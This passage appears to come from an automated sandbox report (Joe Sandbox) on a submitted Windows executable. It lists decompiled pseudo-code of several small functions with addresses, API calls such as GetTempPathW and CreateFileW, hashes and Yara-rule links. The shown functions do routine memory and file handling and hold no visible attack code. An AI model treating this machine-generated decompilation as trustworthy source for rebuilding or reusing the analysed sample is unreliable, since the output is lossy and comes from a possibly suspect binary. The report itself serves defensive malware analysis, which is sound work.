				_t46 = E0040ED82(_t81 - 0x94, _t81, _t86,  *((intOrPtr*)(_t81 + 0xc)));
				 *((intOrPtr*)(_t81 + 0x14)) = _t46;
				if(_t46 == 0) {
					 *((char*)(_t79 + 0x178)) = 1;
					_t48 = E00410B21(_t81 - 0x94, _t79 + 0x30); // executed
					__eflags = _t48;
					 *((intOrPtr*)(_t81 + 0x14)) = _t48;
					if(_t48 == 0) {
						E004063E5(_t79 + 0x28,  *((intOrPtr*)(_t81 + 0xc)));
						_t50 =  *((intOrPtr*)(_t81 - 0x94));
						 *((char*)(_t81 - 4)) = 2;
						__eflags = _t50;
						if(_t50 != 0) {
							 *((intOrPtr*)( *_t50 + 8))(_t50);
						}
						__eflags = _t76;
						 *((char*)(_t81 - 4)) = 1;
						if(_t76 != 0) {
							 *((intOrPtr*)( *_t76 + 8))(_t76);
						}
						_t51 = 0;
					} else {
						_t55 =  *((intOrPtr*)(_t81 - 0x94));
						 *((char*)(_t81 - 4)) = 2;
						__eflags = _t55;
						if(_t55 != 0) {
							 *((intOrPtr*)( *_t55 + 8))(_t55);
						}
						__eflags = _t76;
						 *((char*)(_t81 - 4)) = 1;
						if(_t76 != 0) {
							 *((intOrPtr*)( *_t76 + 8))(_t76);
						}
						_t51 =  *((intOrPtr*)(_t81 + 0x14));
					}
				} else {
					_t59 =  *((intOrPtr*)(_t81 - 0x94));
					 *((char*)(_t81 - 4)) = 2;
					if(_t59 != 0) {
						 *((intOrPtr*)( *_t59 + 8))(_t59);
					}
					 *((char*)(_t81 - 4)) = 1;
					if(_t76 != 0) {
						 *((intOrPtr*)( *_t76 + 8))(_t76);
					}
					_t51 =  *((intOrPtr*)(_t81 + 0x14));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t51;
			}
















                                                                                                                            0x0040e525
                                                                                                                            0x0040e532
                                                                                                                            0x0040e536
                                                                                                                            0x0040e53e
                                                                                                                            0x0040e541
                                                                                                                            0x0040e544
                                                                                                                            0x0040e547
                                                                                                                            0x0040e54b
                                                                                                                            0x0040e54d
                                                                                                                            0x0040e550
                                                                                                                            0x0040e555
                                                                                                                            0x0040e555
                                                                                                                            0x0040e558
                                                                                                                            0x0040e55e
                                                                                                                            0x0040e564
                                                                                                                            0x0040e568
                                                                                                                            0x0040e571
                                                                                                                            0x0040e575
                                                                                                                            0x0040e57e
                                                                                                                            0x0040e585
                                                                                                                            0x0040e588
                                                                                                                            0x0040e5be
                                                                                                                            0x0040e5c5
                                                                                                                            0x0040e5ca
                                                                                                                            0x0040e5cc
                                                                                                                            0x0040e5cf
                                                                                                                            0x0040e5fe
                                                                                                                            0x0040e603
                                                                                                                            0x0040e609
                                                                                                                            0x0040e60d
                                                                                                                            0x0040e60f
                                                                                                                            0x0040e614
                                                                                                                            0x0040e614
                                                                                                                            0x0040e617
                                                                                                                            0x0040e619
                                                                                                                            0x0040e61d
                                                                                                                            0x0040e622
                                                                                                                            0x0040e622
                                                                                                                            0x0040e625
                                                                                                                            0x0040e5d1
                                                                                                                            0x0040e5d1
                                                                                                                            0x0040e5d7
                                                                                                                            0x0040e5db
                                                                                                                            0x0040e5dd
                                                                                                                            0x0040e5e2
                                                                                                                            0x0040e5e2
                                                                                                                            0x0040e5e5
                                                                                                                            0x0040e5e7
                                                                                                                            0x0040e5eb
                                                                                                                            0x0040e5f0
                                                                                                                            0x0040e5f0
                                                                                                                            0x0040e5f3
                                                                                                                            0x0040e5f3
                                                                                                                            0x0040e58a
                                                                                                                            0x0040e58a
                                                                                                                            0x0040e590
                                                                                                                            0x0040e596
                                                                                                                            0x0040e59b
                                                                                                                            0x0040e59b
                                                                                                                            0x0040e5a0
                                                                                                                            0x0040e5a4
                                                                                                                            0x0040e5a9
                                                                                                                            0x0040e5a9
                                                                                                                            0x0040e5ac
                                                                                                                            0x0040e5ac
                                                                                                                            0x0040e648
                                                                                                                            0x0040e651

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040E525
                                                                                                                              • Part of subcall function 00410B21: __EH_prolog.LIBCMT ref: 00410B26
                                                                                                                              • Part of subcall function 00410B21: _CxxThrowException.MSVCRT(?,0041DE18), ref: 00410B65
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$ExceptionThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2366012087-0
                                                                                                                            • Opcode ID: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
                                                                                                                            • Instruction ID: 710ff75e20c748aeae2c70901895ef3fcc3945575a6bdc354df96893f0d3ab55
                                                                                                                            • Opcode Fuzzy Hash: 90830b7693d5648a5944311c11a3abd2fc51c06453079e5404b3f0681c69fa04
                                                                                                                            • Instruction Fuzzy Hash: E8419130900149DFDB11CFA9C988B9DBBF4AF15308F5848AEE409A7382D779DE95CB21
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404A40 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 94%
                                                                                                                            			E00404A40(char* __ecx, void* __eflags) {
				void* _t15;
				intOrPtr* _t18;
				signed char _t20;
				void* _t25;
				void* _t26;
				char* _t40;
				void* _t42;

				E00418D80(E00419948, _t42);
				_t40 = __ecx;
				_t15 = E00404ACE(__ecx);
				if(_t15 != 0) {
					E0040368D(_t42 - 0x18);
					 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
					if(E004048D6(_t42 - 0x18) != 0) {
						_t18 = E00403656(_t42 - 0x24, _t42 - 0x18,  *((intOrPtr*)(_t42 + 8)));
						 *(_t42 - 4) = 1;
						_t20 = E0040492E( *_t18, 1, _t40 + 4, 0); // executed
						asm("sbb bl, bl");
						_t25 =  ~_t20 + 1;
						_t17 = E00403204(_t20,  *((intOrPtr*)(_t42 - 0x24)));
						if(_t25 != 0) {
							goto L2;
						} else {
							 *_t40 = 1;
							_t26 = _t25 + 1;
						}
					} else {
						L2:
						_t26 = 0;
					}
					E00403204(_t17,  *((intOrPtr*)(_t42 - 0x18)));
					_t15 = _t26;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
				return _t15;
			}










                                                                                                                            0x00404a45
                                                                                                                            0x00404a4e
                                                                                                                            0x00404a50
                                                                                                                            0x00404a57
                                                                                                                            0x00404a5d
                                                                                                                            0x00404a62
                                                                                                                            0x00404a70
                                                                                                                            0x00404a7f
                                                                                                                            0x00404a90
                                                                                                                            0x00404a94
                                                                                                                            0x00404aa0
                                                                                                                            0x00404aa2
                                                                                                                            0x00404aa4
                                                                                                                            0x00404aac
                                                                                                                            0x00000000
                                                                                                                            0x00404aae
                                                                                                                            0x00404aae
                                                                                                                            0x00404ab1
                                                                                                                            0x00404ab1
                                                                                                                            0x00404a72
                                                                                                                            0x00404a72
                                                                                                                            0x00404a72
                                                                                                                            0x00404a72
                                                                                                                            0x00404ab6
                                                                                                                            0x00404abc
                                                                                                                            0x00404abe
                                                                                                                            0x00404ac3
                                                                                                                            0x00404acb

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00404A45
                                                                                                                              • Part of subcall function 004048D6: GetTempPathW.KERNEL32(00000105,00000000,?,00000000), ref: 00404901
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prologPathTemp
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295663095-0
                                                                                                                            • Opcode ID: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
                                                                                                                            • Instruction ID: 500e7c3c87435707449ca800f4b4260e57527cfcbd0d94049d93bf02f8690a9f
                                                                                                                            • Opcode Fuzzy Hash: a49cf9d5a64c2d9107d1a1b4841457935b9914ca147be5eea58a22da2a77a225
                                                                                                                            • Instruction Fuzzy Hash: 5201D2715801059ACF10EF65DA12BDDBBA4AF65308F04406FEA41732D2DB3E0A48CB58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CF67 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 86%
                                                                                                                            			E0040CF67(signed int __ecx, void* __edi) {
				void* _t22;
				signed int _t35;
				void* _t38;

				E00418D80(E0041A2E8, _t38);
				_push(__ecx);
				_t35 = __ecx;
				 *((intOrPtr*)(_t38 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x41ba6c;
				 *(_t38 - 4) = 5;
				E00407C33(__ecx);
				 *(_t38 - 4) = 4;
				E0040D079(_t35 + 0x7c, __edi);
				 *(_t38 - 4) = 3;
				E00403204(E00403204(E0040CE6F(_t35 + 0x70, __edi),  *((intOrPtr*)(_t35 + 0x5c))),  *((intOrPtr*)(_t35 + 0x50)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				E0040CFE0(_t35);
				 *(_t38 - 4) =  *(_t38 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t22 = E0040D028( ~_t35 & _t35 + 0x00000018); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t38 - 0xc));
				return _t22;
			}






                                                                                                                            0x0040cf6c
                                                                                                                            0x0040cf71
                                                                                                                            0x0040cf73
                                                                                                                            0x0040cf75
                                                                                                                            0x0040cf78
                                                                                                                            0x0040cf7e
                                                                                                                            0x0040cf85
                                                                                                                            0x0040cf8d
                                                                                                                            0x0040cf91
                                                                                                                            0x0040cf99
                                                                                                                            0x0040cfad
                                                                                                                            0x0040cfb2
                                                                                                                            0x0040cfba
                                                                                                                            0x0040cfbf
                                                                                                                            0x0040cfca
                                                                                                                            0x0040cfce
                                                                                                                            0x0040cfd7
                                                                                                                            0x0040cfdf

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040CF6C
                                                                                                                              • Part of subcall function 0040D079: __EH_prolog.LIBCMT ref: 0040D07E
                                                                                                                              • Part of subcall function 0040CE6F: __EH_prolog.LIBCMT ref: 0040CE74
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                              • Part of subcall function 0040CFE0: __EH_prolog.LIBCMT ref: 0040CFE5
                                                                                                                              • Part of subcall function 0040D028: __EH_prolog.LIBCMT ref: 0040D02D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2654054672-0
                                                                                                                            • Opcode ID: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
                                                                                                                            • Instruction ID: 790da130da96b865fcd1dde8fbfb491d557677c493d466ae6f611681a479457d
                                                                                                                            • Opcode Fuzzy Hash: c04d202dfaf42dce8f38389c920a9751c2b394dc520640e78194b7a5e7c61d27
                                                                                                                            • Instruction Fuzzy Hash: 26F0D671D14654DACB19EB69D41179DBBE09F0030CF10429EE052732C2CBBC1B048A4D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040CF16 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040CF16(void* __ebx, intOrPtr* __ecx) {
				void* __edi;
				void* _t10;
				void* _t11;
				intOrPtr* _t21;
				signed int _t24;
				void* _t26;

				_t9 = E00418D80(E0041A294, _t26);
				_push(__ecx);
				_t21 = __ecx;
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				_t24 =  *(__ecx + 4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				if(_t24 != 0) {
					do {
						_t9 =  *_t21;
						_t24 = _t24 - 1;
						_t13 =  *((intOrPtr*)( *_t21 + _t24 * 4));
						if( *((intOrPtr*)( *_t21 + _t24 * 4)) != 0) {
							_t11 = E0040CF67(_t13, _t21); // executed
							_t9 = E00403204(_t11, _t13);
						}
					} while (_t24 != 0);
				}
				_t10 = E00403204(_t9,  *_t21);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t10;
			}









                                                                                                                            0x0040cf1b
                                                                                                                            0x0040cf20
                                                                                                                            0x0040cf23
                                                                                                                            0x0040cf25
                                                                                                                            0x0040cf28
                                                                                                                            0x0040cf2b
                                                                                                                            0x0040cf31
                                                                                                                            0x0040cf34
                                                                                                                            0x0040cf34
                                                                                                                            0x0040cf36
                                                                                                                            0x0040cf37
                                                                                                                            0x0040cf3c
                                                                                                                            0x0040cf40
                                                                                                                            0x0040cf46
                                                                                                                            0x0040cf4b
                                                                                                                            0x0040cf4c
                                                                                                                            0x0040cf50
                                                                                                                            0x0040cf53
                                                                                                                            0x0040cf5e
                                                                                                                            0x0040cf66

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040CF1B
                                                                                                                              • Part of subcall function 0040CF67: __EH_prolog.LIBCMT ref: 0040CF6C
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2654054672-0
                                                                                                                            • Opcode ID: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
                                                                                                                            • Instruction ID: 9ff98c2d2858f5676d26b2fcb0e5ae345ac01743015ec23c8b6fe664862117fb
                                                                                                                            • Opcode Fuzzy Hash: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
                                                                                                                            • Instruction Fuzzy Hash: 47F0E9325012129BD711AF0AD481B9EF7A9EF14724F04417FE101772C2CB789C008989
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004051AE Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E004051AE(void* __ecx, void* __eflags) {
				void* _t12;
				void* _t27;

				E00418D80(E004199B4, _t27);
				E00404D7D(_t27 - 0x44);
				E0040368D(_t27 - 0x1c);
				_t3 = _t27 - 4;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				_t12 = E00404DAF(_t27 - 0x44,  *_t3, __ecx); // executed
				E00403204(_t12,  *((intOrPtr*)(_t27 - 0x1c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t12;
			}





                                                                                                                            0x004051b3
                                                                                                                            0x004051c2
                                                                                                                            0x004051ca
                                                                                                                            0x004051cf
                                                                                                                            0x004051cf
                                                                                                                            0x004051d7
                                                                                                                            0x004051e1
                                                                                                                            0x004051ee
                                                                                                                            0x004051f6

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 004051B3
                                                                                                                              • Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4
                                                                                                                              • Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2654054672-0
                                                                                                                            • Opcode ID: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
                                                                                                                            • Instruction ID: 38aad06e79cda41a368b4c7dfbcb60c19aab280267c900351c7127d69cc129a5
                                                                                                                            • Opcode Fuzzy Hash: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
                                                                                                                            • Instruction Fuzzy Hash: 98E09272C400049AC704FB55E852AECB778EF61319F10407FE412731D18B3C1F08CA58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040DCA3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040DCA3(intOrPtr __ecx, void* __eflags) {
				void* _t27;

				E00418D80(E0041A402, _t27);
				_push(__ecx);
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x41bd04;
				 *((intOrPtr*)(__ecx + 4)) = 0x41bce8;
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				E0040DD07(__eflags); // executed
				_t8 = __ecx + 0x28;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) & 0x00000000;
				 *(_t27 - 4) = 1;
				E0040DF75(__ecx + 0x30,  *_t8);
				 *((intOrPtr*)(__ecx)) = 0x41bcb4;
				 *((intOrPtr*)(__ecx + 4)) = 0x41bc98;
				 *((intOrPtr*)(__ecx + 0x180)) = 4;
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return __ecx;
			}




                                                                                                                            0x0040dca8
                                                                                                                            0x0040dcad
                                                                                                                            0x0040dcb1
                                                                                                                            0x0040dcb4
                                                                                                                            0x0040dcba
                                                                                                                            0x0040dcc1
                                                                                                                            0x0040dcc5
                                                                                                                            0x0040dccc
                                                                                                                            0x0040dcd1
                                                                                                                            0x0040dcd1
                                                                                                                            0x0040dcd8
                                                                                                                            0x0040dcdc
                                                                                                                            0x0040dce4
                                                                                                                            0x0040dcea
                                                                                                                            0x0040dcf1
                                                                                                                            0x0040dcfe
                                                                                                                            0x0040dd06

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
                                                                                                                            • Instruction ID: a9dd8ae4a789225e50b84d489bf84e0c6a5884a04ef7bcfbc1ff797b67dd35a1
                                                                                                                            • Opcode Fuzzy Hash: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
                                                                                                                            • Instruction Fuzzy Hash: 17F017B1921B54DBD724DF54D1047DABBF4FF14319F00891ED09653681DBB86988CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C9A6 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 79%
                                                                                                                            			E0040C9A6(void* __ebx, signed int __ecx) {
				void* _t13;
				void* _t26;

				E00418D80(E0041A1DF, _t26);
				_push(__ecx);
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				 *(_t26 - 4) = 2;
				E0040CF16(__ebx, __ecx + 0x78); // executed
				 *(_t26 - 4) = 1;
				E0040CEC5(__ebx, __ecx + 0x6c); // executed
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t13 = E0040C9F3( ~__ecx & __ecx + 0x00000004);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t13;
			}





                                                                                                                            0x0040c9ab
                                                                                                                            0x0040c9b0
                                                                                                                            0x0040c9b4
                                                                                                                            0x0040c9ba
                                                                                                                            0x0040c9c1
                                                                                                                            0x0040c9c9
                                                                                                                            0x0040c9cd
                                                                                                                            0x0040c9d2
                                                                                                                            0x0040c9dd
                                                                                                                            0x0040c9e1
                                                                                                                            0x0040c9ea
                                                                                                                            0x0040c9f2

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040C9AB
                                                                                                                              • Part of subcall function 0040CF16: __EH_prolog.LIBCMT ref: 0040CF1B
                                                                                                                              • Part of subcall function 0040CEC5: __EH_prolog.LIBCMT ref: 0040CECA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
                                                                                                                            • Instruction ID: 26fffc1e8155d05b72e6de97fa5396bbbae1cf3f6b56db7a32a7b9711ce441f4
                                                                                                                            • Opcode Fuzzy Hash: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
                                                                                                                            • Instruction Fuzzy Hash: 78E0E571900664DADB08EB58C4523DCB760EB05328F00436EA853B32C1CBB82B00C689
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409D63 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 82%
                                                                                                                            			E00409D63(void* __ecx) {
				void* _t28;
				intOrPtr _t30;

				E00418D80(E00419D8C, _t28);
				_push(__ecx);
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 - 0x10)) = _t30;
				E004063E5( *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) +  *(_t28 + 8) * 4)) + 4))());
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return 0;
			}





                                                                                                                            0x00409d68
                                                                                                                            0x00409d6d
                                                                                                                            0x00409d74
                                                                                                                            0x00409d7e
                                                                                                                            0x00409d88
                                                                                                                            0x00409da1
                                                                                                                            0x00409daa

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3519838083-0
                                                                                                                            • Opcode ID: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
                                                                                                                            • Instruction ID: 924b7e828e2619065f90ec1c606901b0d7d869b936ff608bc391d1a571cd581b
                                                                                                                            • Opcode Fuzzy Hash: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
                                                                                                                            • Instruction Fuzzy Hash: 8AE0ED76614104EFC704EF99D855F9EB7B8EF49354F10846EF40A97281C7799900CA68
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040525F Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040525F(void** __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				void* _t9;
				void** _t14;

				_t14 = __ecx;
				_t8 = E00405298(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t14 = _t9;
					return 0 | _t9 != 0xffffffff;
				}
				return _t8;
			}






                                                                                                                            0x00405263
                                                                                                                            0x00405265
                                                                                                                            0x0040526c
                                                                                                                            0x00405281
                                                                                                                            0x0040528f
                                                                                                                            0x00000000
                                                                                                                            0x00405291
                                                                                                                            0x00405295

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405298: FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3
                                                                                                                            • CreateFileW.KERNELBASE(?,?,00000000,00000000,?,0041B558,00000000,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0), ref: 00405281
                                                                                                                            Memory Dump Source
